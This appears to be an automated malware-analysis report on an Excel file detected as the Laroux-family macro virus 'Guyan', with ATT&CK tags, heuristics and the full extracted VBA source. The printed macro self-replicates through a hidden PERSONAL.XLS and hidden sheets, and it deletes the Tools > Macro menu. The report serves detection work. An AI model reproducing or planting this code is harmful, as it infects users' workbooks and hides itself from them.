MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file is detected as Xls.Trojan.Laroux-27 by ClamAV. It contains a VBA macro with an Auto_Open subroutine that attempts to establish persistence by creating or modifying the PERSONAL.XLS file in the Excel startup path. This macro is designed to run automatically when Excel is opened.
Heuristics 3
-
ClamAV: Xls.Trojan.Laroux-27 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Laroux-27
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2271 bytes |
SHA-256: 47b7375f9d1808813466da0870fa61c9638e24d3fdcafcac62c950f855af6320 |
|||
|
Detection
ClamAV:
Xls.Trojan.Laroux-27
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "guyan"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "al_muskilat"
End Sub
Sub al_muskilat()
Attribute al_muskilat.VB_ProcData.VB_Invoke_Func = " \n14"
' *****************************************************************
' Name : ExcelMacro.al_muskilat
' Origin : England
' Created : January 01, 1997
' Author : Pyro [VBB]
' *****************************************************************
On Error GoTo ErrorHandler
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Installed = 0
If ThisWorkbook.Name <> "PERSONAL.XLS" Then
If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then Installed = 1
If Installed = 1 Then
GoTo ErrorHandler
Else
Workbooks.Add.SaveAs FileName:=Application.StartupPath + "\PERSONAL.XLS"
Workbooks(ThisWorkbook.Name).Sheets("guyan").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Sheets("guyan").Visible = False
Workbooks("PERSONAL.XLS").Save
Windows("PERSONAL.XLS").Visible = False
End If
Else
Windows("PERSONAL.XLS").Visible = False
For I = 1 To Workbooks(ActiveWorkbook.Name).Sheets.Count
If Workbooks(ActiveWorkbook.Name).Sheets(I).Name = "guyan" Then Installed = 1
Next
If Installed = 1 Then
GoTo ErrorHandler
Else
Workbooks("PERSONAL.XLS").Sheets("guyan").Copy Before:=Workbooks(ActiveWorkbook.Name).Sheets(1)
Workbooks(ActiveWorkbook.Name).Sheets("guyan").Visible = False
Workbooks(ActiveWorkbook.Name).Save
Windows("PERSONAL.XLS").Visible = False
End If
End If
Workbooks("PERSONAL.XLS").Save
Application.ScreenUpdating = True
Application.DisplayAlerts = True
If Day(Now()) = Int((31 * Rnd) + 1) Then MsgBox "You've Been Infected By Guyan!", 16, "Ha....Ha....Ha... [VBB]"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
ErrorHandler:
On Error Resume Next
Err = 0
Workbooks(ActiveWorkbook.Name).Sheets("guyan").Visible = False
On Error GoTo 0
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.